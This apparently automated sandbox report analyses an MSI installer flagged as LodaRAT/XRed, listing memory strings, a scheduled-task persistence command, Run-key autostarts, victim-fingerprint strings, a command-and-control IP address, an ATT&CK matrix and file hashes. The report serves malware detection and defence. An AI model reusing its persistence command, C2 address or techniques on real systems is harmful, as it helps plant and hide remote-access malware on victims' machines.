              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a9oh6cy4tz5p8xq5ty9ucmemstr_ccad72b0-f
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f1ro5tz1p3jc6tw8w9ucmemstr_1006d8d0-1
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a9oh6cy4tz5p2bs1rp8a|memstr_857ab75d-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f1ro5tz1p3jc6tw8w2rocmemstr_245db1aa-d
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f1ro5tz1p3jc6tw8w_81|memstr_26a079b2-2
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a9oh6cy4tz5p1gl3mf7acmemstr_acca9cf7-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|admin|x|user|win_81|memstr_fc0ae78a-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hkcu\software\win32|memstr_7d525cb2-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f1ro5tz1p8ue5pa9y7acmemstr_b01029c7-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d172.111.138.100memstr_d348d81d-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a9oh6cy4tz5p8xq5ty9uca@memstr_98366525-a
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l9at8bn1p5pe2be0d21|h@memstr_5d033fc3-c
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: int tv_sec;int tv_usecs@memstr_69e57285-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f1ro5tz1p3jc6tw8w2|z@memstr_39503d3e-d
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l9at8bn1p5pe2be0d2]@memstr_a033c4a8-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hkcu\software\win32co@,wmemstr_f1807de7-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a9oh6cy4tz5p2bs1rp8acv@'wmemstr_aafb164d-1
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1@fwmemstr_ae48ebce-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ka(v#memstr_1462fc00-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ra#v$memstr_aee46fbc-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ua:v%memstr_f078783b-2
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |a=v&memstr_a19f35d4-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *akv,memstr_10e8e6cc-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -abv-memstr_ef48181a-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4aev.memstr_225af4e6-c
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?a|v/memstr_2871a157-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 227301890l227301950l227301939l227302006l227301945l227301926l227301939l227301924l227301943l227301922l227301951l227301945l227301944l227302006l227301941l227301945l227301947l227301926l227301946l227301939l227301922l227301939l227301938l227302006l227301925l227301923l227301941l227301941l227301939l227301925l227301925l227301936l227301923l227301946l227301946l227301935l227302008l227302006zmemstr_0f4fa5f1-a
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 227301890l227301950l227301939l227302006l227301940l227301923l227301936l227301936l227301939l227301924l227302006l227301951l227301925l227302006l227301922l227301945l227301945l227302006l227301925l227301947l227301943l227301946l227301946l227302006l227301922l227301945l227302006l227301941l227301945l227301944l227301922l227301943l227301951l227301944l227302006l227301922l227301950l227301939l227302006l227301939l227301944l227301922l227301924l227301935l227302008227301memstr_077d9976-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 227301911l227301944l227302006l227301951l227301944l227301920l227301943l227301946l227301951l227301938l227302006l227301926l227301943l227301924l227301943l227301947l227301939l227301922l227301939l227301924l227302006l227301921l227301943l227301925l227302006l227301926l227301943l227301925l227301925l227301939l227301938l227302006l227301922l227301945l227302006l227301943l227302006l227301925l227301939l227301924l227301920l227301951l227301941l227301939l227302006l227301945l227301924l227302006l227301936l227301923l227301944l227301941l227301922l227301951l227301945l227301944l227302008xmemstr_bb97ce23-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 227301911l227301944l227302006l227301951l227301944l227301920l227301943l227301946l227301951l227301938l227302006l227301918l227301911l227301912l227301906l227301914l227301907l227302006l227301921l227301943l227301925l227302006l227301925l227301926l227301939l227301941l227301951l227301936l227301951l227301939l227301938l227302008zmemstr_fb393bd5-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 227301911l227301944l227302006l227301939l227301924l227301924l227301945l227301924l227302006l227301945l227301941l227301941l227301923l227301924l227301924l227301939l227301938l227302006l227301951l227301944l227302006l227301924l227301939l227301943l227301938l227301951l227301944l227301937l227302006l227301945l227301924l227302006l227301921l227301924l227301951l227301922l227301951l227301944l227301937l227302006l227301938l227301943l227301922l227301943l22730200801926l-memstr_7bebea51-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: clsid\{172bddf8-ceea-11d1-8b05-00600806d9b6}memstr_226d158c-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 2.4.5.0gxky
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 2.4.6.0
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: win_81
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: desktop
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ncalrpcx[\z
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: cmd.exe
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: startup
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: startup
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: hkcu\so
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: sracmb
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: /q.lnk
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: enabx
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: wparam
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 849224
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: lparam
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 849224gw
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 7852h
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: music
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: profile
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: videos
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: common!p
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_00364B52 SendInput,keybd_event,3_2_00364B52
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_00367DD5 mouse_event,3_2_00367DD5
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn VYZSPQ.exe /tr C:\Users\user\AppData\Roaming\Windata\SRACMB.exe /sc minute /mo 1
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_0035B398 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,3_2_0035B398
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_0035BE31 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,3_2_0035BE31
              Source: MSI4976.tmp, SRACMB.exe | Binary or memory string: Shell_TrayWnd
              Source: MSI4976.tmp, 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp, SRACMB.exe, 00000008.00000002.1427524418.000000000015E000.00000040.00000001.01000000.00000007.sdmp, SRACMB.exe, 00000009.00000002.1495148976.000000000015E000.00000040.00000001.01000000.00000007.sdmp | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_00347254 cpuid 3_2_00347254
              Source: C:\Windows\System32\msiexec.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\msiexec.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\Installer\MSI4976.tmp | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_003440DA GetSystemTimeAsFileTime,__aulldiv,3_2_003440DA
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_0039C146 GetUserNameW,3_2_0039C146
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_00352C3C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,3_2_00352C3C
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_0033E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,3_2_0033E47B
              Source: C:\Windows\SysWOW64\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: MSI4976.tmp, 00000003.00000002.2615051893.0000000001822000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Windows\Installer\MSI4976.tmp | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct

              Stealing of Sensitive Information

              Source: Yara match | File source: Process Memory Space: MSI4976.tmp PID: 7764, type: MEMORYSTR
              Source: MSI4976.tmp, 00000003.00000002.2616628819.0000000004A1F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: x|Admin|x|user|WIN_81|X64| |Windows Defender|192.168.2.9|ddd|Pr1024X21280X3|Desktop|0|beta27301924L227301945L227301924e
              Source: MSI4976.tmp, 00000003.00000002.2615051893.0000000001822000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: x|Admin|x|user|WIN_81|X64| |Windows Defender|ograms
              Source: SRACMB.exe, 00000012.00000002.2301030443.000000000015E000.00000040.00000001.01000000.00000007.sdmp | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 10, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytea
              Source: SRACMB.exe, 00000012.00000003.2281901155.000000000495F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: WIN_81
              Source: MSI4976.tmp, 00000003.00000002.2615051893.0000000001822000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: x|Admin|x|user|WIN_81|X64| |Windows Defender|xe
              Source: SRACMB.exe | Binary or memory string: WIN_XP
              Source: MSI4976.tmp, 00000003.00000002.2615051893.0000000001822000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: x|Admin|x|user|WIN_81|X64| |Windows Defender|-383053
              Source: SRACMB.exe, 0000000D.00000003.1563336074.00000000047F5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: WIN_81|
              Source: MSI4976.tmp, 00000003.00000002.2616628819.0000000004A1F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: x|Admin|x|user|WIN_81|X64| |Windows Defender|192.168.2.9|ddd|Pr1024X21280X3|Desktop|0|beta
              Source: MSI4976.tmp, 00000003.00000002.2616628819.0000000004A1F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: x|Admin|x|user|WIN_81|X64| |Windows Defender|192.168.2.9|ddd|Pr1024X21280X3|Desktop|0|beta6
              Source: SRACMB.exe, 0000000E.00000002.1660699190.00000000044D5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: WIN_81(
              Source: SRACMB.exe | Binary or memory string: WIN_XPe
              Source: SRACMB.exe, 0000000F.00000003.1695804980.0000000004B02000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: WIN_81
              Source: SRACMB.exe | Binary or memory string: WIN_VISTA
              Source: SRACMB.exe, 00000009.00000003.1480092843.0000000004500000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: WIN_81O
              Source: MSI4976.tmp, 00000003.00000002.2615051893.0000000001822000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: x|Admin|x|user|WIN_81|X64| |Windows Defender|mp{T
              Source: SRACMB.exe | Binary or memory string: WIN_7
              Source: MSI4976.tmp, 00000003.00000002.2615051893.0000000001822000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: x|Admin|x|user|WIN_81|X64| |Windows Defender|
              Source: MSI4976.tmp, 00000003.00000002.2615051893.0000000001822000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: x|Admin|x|user|WIN_81|X64| |Windows Defender|xeq
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: x|Admin|x|user|WIN_81|
              Source: SRACMB.exe | Binary or memory string: WIN_8
              Source: MSI4976.tmp, 00000003.00000002.2616628819.0000000004A1F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: x|Admin|x|user|WIN_81|X64| |Windows Defender|192.168.2.9|ddd|Pr1024X21280X3|Desktop|0|betasG
              Source: Yara match | File source: Process Memory Space: MSI4976.tmp PID: 7764, type: MEMORYSTR

              Remote Access Functionality

              Source: Yara match | File source: Process Memory Space: MSI4976.tmp PID: 7764, type: MEMORYSTR
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_003791DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,3_2_003791DC
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_003796E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,3_2_003796E2
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: 8_2_001091DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,8_2_001091DC
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: 8_2_001096E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,8_2_001096E2
              MITRE ATT&CK Matrix (one row per rank of techniques; a number before a technique name is the counter the report attaches to that technique, cells without a number carry no counter):

              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
              Gather Victim Identity Information | 11 Scripting | 2 Valid Accounts | 11 Windows Management Instrumentation | 11 Scripting | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 21 Input Capture | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
              Credentials | Domains | 1 Replication Through Removable Media | 2 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 11 Peripheral Device Discovery | Remote Desktop Protocol | 21 Input Capture | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
              Email Addresses | DNS Server | Domain Accounts | 1 Scheduled Task/Job | 2 Valid Accounts | 2 Valid Accounts | 21 Obfuscated Files or Information | Security Account Manager | 1 Account Discovery | SMB/Windows Admin Shares | 3 Clipboard Data | Steganography | Automated Exfiltration | Data Encrypted for Impact
              Employee Names | Virtual Private Server | Local Accounts | Cron | 1 Scheduled Task/Job | 21 Access Token Manipulation | 1 Software Packing | NTDS | 2 File and Directory Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
              Gather Victim Network Information | Server | Cloud Accounts | Launchd | 11 Registry Run Keys / Startup Folder | 12 Process Injection | 1 DLL Side-Loading | LSA Secrets | 28 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
              Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 1 Scheduled Task/Job | 121 Masquerading | Cached Domain Credentials | 261 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
              DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | 11 Registry Run Keys / Startup Folder | 2 Valid Accounts | DCSync | 12 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
              Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Virtualization/Sandbox Evasion | Proc Filesystem | 3 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
              Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 21 Access Token Manipulation | /etc/passwd and /etc/shadow | 11 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
              IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 12 Process Injection | Network Sniffing | 1 System Owner/User Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
              Behavior Graph ID: 1582342, Sample: sdlvrr.msi, Startdate: 30/12/2024, Architecture: WINDOWS, Score: 100

              • Signatures on the sample: Suricata IDS alerts for network traffic; Multi AV Scanner detection for submitted file; Yara detected LodaRAT; 4 other signatures
              • Processes started from the sample: msiexec.exe; SRACMB.exe; SRACMB.exe; 5 other processes
              • msiexec.exe: dropped C:\Windows\Installer\MSI4976.tmp (PE32) and started MSI4976.tmp (Drops executables to the windows directory (C:\Windows) and starts them)
              • SRACMB.exe: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Found API chain indicative of sandbox detection
              • MSI4976.tmp: network contact with 172.111.138.100, 49817, 49869, 49929 VOXILITYGB United States; dropped C:\Users\user\AppData\Roaming\...\SRACMB.exe (PE32) and C:\Users\user\AppData\Local\Temp\VYZSPQ.vbs (ASCII); Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; started cmd.exe and wscript.exe
              • cmd.exe: Uses schtasks.exe or at.exe to add and modify task schedules; started conhost.exe and schtasks.exe
              • wscript.exe: Windows Scripting host queries suspicious COM object (likely to drop second stage)

              Source | Detection | Scanner | Label
              sdlvrr.msi | 50% | Virustotal |
              sdlvrr.msi | 42% | ReversingLabs | Script-AutoIt.Trojan.Lisk

              Source | Detection | Scanner | Label
              C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | 100% | Joe Sandbox ML |
              C:\Windows\Installer\MSI4976.tmp | 100% | Joe Sandbox ML |
              C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | 53% | ReversingLabs | Win32.Trojan.Lisk
              C:\Windows\Installer\MSI4976.tmp | 53% | ReversingLabs | Win32.Trojan.Lisk

              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              s-part-0017.t-0009.t-msedge.net | 13.107.246.45 | true | false | | high

                  Name | Source | Malicious | Antivirus Detection | Reputation
                  http://ip-score.com/checkip/ | MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  IP | Domain | Country | ASN | ASN Name | Malicious
                  172.111.138.100 | unknown | United States | 3223 | VOXILITYGB | true
                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1582342
                  Start date and time:2024-12-30 11:34:36 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 8m 28s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:defaultwindowsofficecookbook.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of new started processes analysed:20
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:sdlvrr.msi
                  Detection:MAL
                  Classification:mal100.troj.evad.winMSI@17/14@0/1
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 90
                  • Number of non-executed functions: 295
                  Cookbook Comments:
                  • Found application associated with file extension: .msi
                  • Close Viewer
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                  • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56, 20.12.23.50
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Report size getting too big, too many NtEnumerateKey calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
10:35:32 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run VYZSPQ "C:\Users\user\AppData\Roaming\Windata\SRACMB.exe"
10:35:33 | Task Scheduler | Run new task: VYZSPQ.exe path: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe
10:35:40 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run VYZSPQ "C:\Users\user\AppData\Roaming\Windata\SRACMB.exe"
10:35:48 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VYZSPQ.lnk
Match | Associated Sample Name / URL | Detection | Threat Name | Context
172.111.138.100 | LWQDFZ.exe | malicious | LodaRAT, XRed |
 | JPS.exe | malicious | LodaRAT, XRed |
 | KOGJZW.exe | malicious | LodaRAT, XRed |
 | Machine-PO.exe | malicious | XRed |
 | AYRASY.exe | malicious | LodaRAT, XRed |
 | 222.exe | malicious | LodaRAT, XRed |
 | mmi8nLybam.exe | malicious | LodaRAT |
 | Supplier 0202AW-PER2 Sheet.exe | malicious | LodaRAT, XRed |
 | Purchase Order No. G02873362-Docx.vbs | malicious | LodaRAT, XRed |
 | New PO - Supplier 0202AW-PER2.exe | malicious | LodaRAT, XRed |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
s-part-0017.t-0009.t-msedge.net | docx.msi | malicious | XRed | 13.107.246.45
 | hoaiuy.msi | malicious | XRed | 13.107.246.45
 | 222.msi | malicious | XRed | 13.107.246.45
 | KOGJZW.exe | malicious | LodaRAT, XRed | 13.107.246.45
 | Machine-PO.exe | malicious | XRed | 13.107.246.45
 | universityform.xlsm | malicious | Unknown | 13.107.246.45
 | universityform.xlsm | malicious | Unknown | 13.107.246.45
 | https://N0.kolivane.ru/da4scmQ/#Memily.gamble@amd.com | malicious | Unknown | 13.107.246.45
 | phish_alert_sp2_2.0.0.0.eml | malicious | Unknown | 13.107.246.45
 | installer64v9.5.7.msi | malicious | Unknown | 13.107.246.45
Match | Associated Sample Name / URL | Detection | Threat Name | Context
VOXILITYGB | LWQDFZ.exe | malicious | LodaRAT, XRed | 172.111.138.100
 | JPS.exe | malicious | LodaRAT, XRed | 172.111.138.100
 | KOGJZW.exe | malicious | LodaRAT, XRed | 172.111.138.100
 | Machine-PO.exe | malicious | XRed | 172.111.138.100
 | AYRASY.exe | malicious | LodaRAT, XRed | 172.111.138.100
 | 222.exe | malicious | LodaRAT, XRed | 172.111.138.100
 | mmi8nLybam.exe | malicious | LodaRAT | 172.111.138.100
 | Supplier 0202AW-PER2 Sheet.exe | malicious | LodaRAT, XRed | 172.111.138.100
 | loligang.mips.elf | malicious | Mirai | 104.250.189.221
 | Purchase Order No. G02873362-Docx.vbs | malicious | LodaRAT, XRed | 172.111.138.100
                                      No context
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):603
                                      Entropy (8bit):5.347313759584736
                                      Encrypted:false
                                      SSDEEP:12:EgKQg8mmIdFyS/cqj//pFvfN2zWotHMphe2WmmY3HDyzgj82:PgT+SkqjM65ptyzAh
                                      MD5:4C834F134CA98C7F93BAA9F691F703DD
                                      SHA1:A3312F95A6E38ABAD9E02179EC6167362A0CEC8B
                                      SHA-256:C9B4DE68EEE4D7C73EA33A7261D63642A4B0F2EF60140ABE548EB0CEF2EC4719
                                      SHA-512:2FF9660A95A5C330CC1F6193E8CA88763DBFF4DDEE88E0A2668DDBE6630BEA760FDCC3D579B4B53B955A24AD0A674C44C196CE3FF5895AEBF95F80842B53245C
                                      Malicious:false
                                      Reputation:low
